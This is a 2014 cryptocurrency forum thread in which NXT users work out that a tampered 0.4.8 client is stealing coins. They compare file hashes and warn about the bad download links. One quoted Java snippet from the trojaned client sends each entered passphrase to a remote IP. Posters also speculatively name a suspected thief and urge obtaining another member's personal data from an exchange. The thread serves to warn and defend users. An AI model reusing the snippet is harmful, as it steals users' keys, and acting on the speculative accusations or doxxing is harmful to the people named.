NXT :: descendant of Bitcoin - Updated Information - page 1949.

intel

member

Activity: 98

Merit: 10

There is not so much information in the internet about evildave + bitcoin. I found something interesting, some evildave speaking dutch used the service "www.happycoins.nl" to buy bitcoins. He paid using paypal.

Here is the quote from his feedback (translated from dutch):

http://www.trustpilot.gr/review/www.happycoins.nl?page=3

Quote

I am very satisfied with the services of Happy Coins, definitely recommended.
They are one of the few mogelikheiden to buy via PayPal, and my experience with a fairly large purchase Bitcoin Bitcoin their was just okay.

Only downside was that it took a little longer to get nearly 90 minutes, the Bitcoins on my wallet, but that was a very busy period.

Original

Quote

HappyCoins: bijna perfecte ervaring met Bitcoins kopen

Ik ben zeer tevreden met de dienstverlening van HappyCoins, zeker een aanrader.
Ze zijn een van de weinig mogelikheiden om Bitcoin in te kopen via iDeal, en mijn ervaring met een vrij grote Bitcoin aankoop bij hun was gewoon goed.

Enige minpunt was dat het heeft wat langer geduurd om de Bitcoins op mijn wallet te krijgen, bijna 90 minuten, maar dat was wel in een hele drukke periode.

So, it's worth to contact with happycoins.nl and get his data.

rickyjames

full member

Activity: 196

Merit: 100

Quote from: jl777 on January 01, 2014, 08:39:58 PM

Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

I made a pact with Intel to publish news at http://info.nxtcrypto.org/, and this is news. I will be typing something up for submission ASAP. If you want to keep a lid on it, good luck with that.

Absolutely PaulyC should be made whole via bounty fund.

PaulyC

member

Activity: 82

Merit: 10

How about just renaming the *correct client, posting it on Page 1, and saying don't use 4.8 at all? or is that too drastic?

newcn

full member

Activity: 143

Merit: 100

Quote from: salsacz on January 01, 2014, 08:38:10 PM

Quote from: newcn on January 01, 2014, 08:21:33 PM

PaulyC:
the 0.4.8 client I used, I forgot where I downloaded it, but from chrome history,
the link was http://162.243.246.223/nxt-client-0.4.8.zip
this client is different from what I Just downloaded from this thread:

Code:

ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (1).zip
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850

Thank you very much for the information!

rickyjames

full member

Activity: 196

Merit: 100

Quote from: utopianfuture on January 01, 2014, 08:35:50 PM

Quote from: PaulyC on January 01, 2014, 08:22:42 PM

Ok here are the two zip files in one file.
The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page?

DO NOT USE THIS FILE FOR NXT:
https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo

Got it. The bogus client is in the link. Can someone check where is the modification ?

You have got to be absolutely fricking kidding me. I have downloaded from mega.co.nz on Tues and walked it over to my nice sterile laptop....

Excuse me while I go do an emergency client download from a trusted source and move my NXT to a new account with a zillion character new passcode....

And when this all settles down I'm going to bring up again a few more dozen times the idea of implementing a withdrawal freeze code....

S3MKi

legendary

Activity: 1540

Merit: 1016

What to do if other users have false client?

PaulyC

member

Activity: 82

Merit: 10

Yea i saw that.. that hurts man, mine was a total loss of 7808, hurt a lot, i bought slowly over time since Dec. 21st. but I still love this currency!

S3MKi

legendary

Activity: 1540

Merit: 1016

Quote from: newcn on January 01, 2014, 08:57:24 PM

Paulc
how much did you lost?
I lost about 18k nxt!

about 7000 i think

utopianfuture

sr. member

Activity: 602

Merit: 268

Internet of Value

Quote from: intel on January 01, 2014, 08:53:44 PM

This is the thread started by epicdices owner:

https://bitcointalksearch.org/topic/ann-epicdicescom-unique-game-testnet-1-edge-invest-provably-fair-356282

I made a note in his thread https://bitcointalksearch.org/topic/m.4263313

newcn

full member

Activity: 143

Merit: 100

Paulc
how much did you lost?
I lost about 18k nxt!

intel

member

Activity: 98

Merit: 10

This is the thread started by epicdices owner:

https://bitcointalksearch.org/topic/ann-epicdicescom-unique-game-testnet-1-edge-invest-provably-fair-356282

salsacz

hero member

Activity: 490

Merit: 504

Quote from: notsoshifty on January 01, 2014, 08:46:08 PM

Quote from: notsoshifty on January 01, 2014, 08:38:41 PM

Interesting...:

Code:

if (!paramString.equals(""))
   {
   if (!myKeys.contains(paramString))
   {
   URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
   URLConnection connection = url.openConnection();
   connection.setConnectTimeout(10000);
   connection.getInputStream();
   myKeys.add(paramString);
   }
   }

epicdices.com is also hosted on 162.243.246.223 - coincidence?

no, as I wrote here, we know identity of the hacker:

162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850

joefox

full member

Activity: 210

Merit: 100

opticalc, QBTC ---

WHY does nxtcrypto.org's download page point to https://mega.co.nz/#!yV5A1BTR!oi33K7WovgccuEHvP05nzggTnxrkZHJbwFmv5tGeXNI

..instead of http://info.nxtcrypto.org/client.zip ...

... and WHY are the hases not published alongside the download link?

salsacz

hero member

Activity: 490

Merit: 504

please check:
https://nextcoin.org/index.php/topic,1586.0.html

the link to the mega there is a hacker's link or not?

Drexme's post was also updated by punkrock, but I am not sure if the link there is good or not
https://nextcoin.org/index.php/topic,4.0.html

PaulyC

member

Activity: 82

Merit: 10

Quote from: utopianfuture on January 01, 2014, 08:42:50 PM

Quote from: jl777 on January 01, 2014, 08:39:58 PM

Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...

James

P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?

Agree. PaulyC deserves a bounty to uncover this type of thief.

OMG that would be amazing if that's possible, or anything.. Not to get ahead of myself but, Newcn too.. I mean he verified to me we had a very similar occurrence, way too much of a coincidence.
Thanks for any help.!

Damelon

legendary

Activity: 1092

Merit: 1010

Quote from: S3MKi on January 01, 2014, 08:45:56 PM

Quote from: salsacz on January 01, 2014, 08:44:12 PM

We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads

agree

joefox already locked some pages today, but there were translator issues related to that.
I'm just saying to let everyone know that he has been on the ball concerning wiki security.

EvilDave

hero member

Activity: 854

Merit: 1001

So, for the slower people here ( ie; me):

The smaller file:
First file inside is 7173063 bytes in size and has the SHA256 hash:
ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip

Is the correct client.

and the larger file:

The second file inside is 7177834 bytes in size and has the SHA256 hash:
948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip

has probably had some sort of backdoor added to allow thievery?

Bastards, btw, if this is confirmed.

notsoshifty

sr. member

Activity: 378

Merit: 250

Quote from: notsoshifty on January 01, 2014, 08:38:41 PM

Interesting...:

Code:

if (!paramString.equals(""))
   {
   if (!myKeys.contains(paramString))
   {
   URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
   URLConnection connection = url.openConnection();
   connection.setConnectTimeout(10000);
   connection.getInputStream();
   myKeys.add(paramString);
   }
   }

epicdices.com is also hosted on 162.243.246.223 - coincidence?

S3MKi

legendary

Activity: 1540

Merit: 1016

Quote from: salsacz on January 01, 2014, 08:44:12 PM

We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads

agree

NxtChoice

full member

Activity: 238

Merit: 100

Quote from: jari76 on January 01, 2014, 11:40:18 AM

Hey there, i started an NXT forging pool, for poeople that want to forge nxt with some reliability or dont want the NXT client running all day long

Website: http://nxt-pool.uk.to/

Nextcoin.org thread: https://nextcoin.org/index.php/topic,1783.0.html

How to confirm you are forging 24/7 ?

Topic: NXT :: descendant of Bitcoin - Updated Information - page 1949. (Read 2761645 times)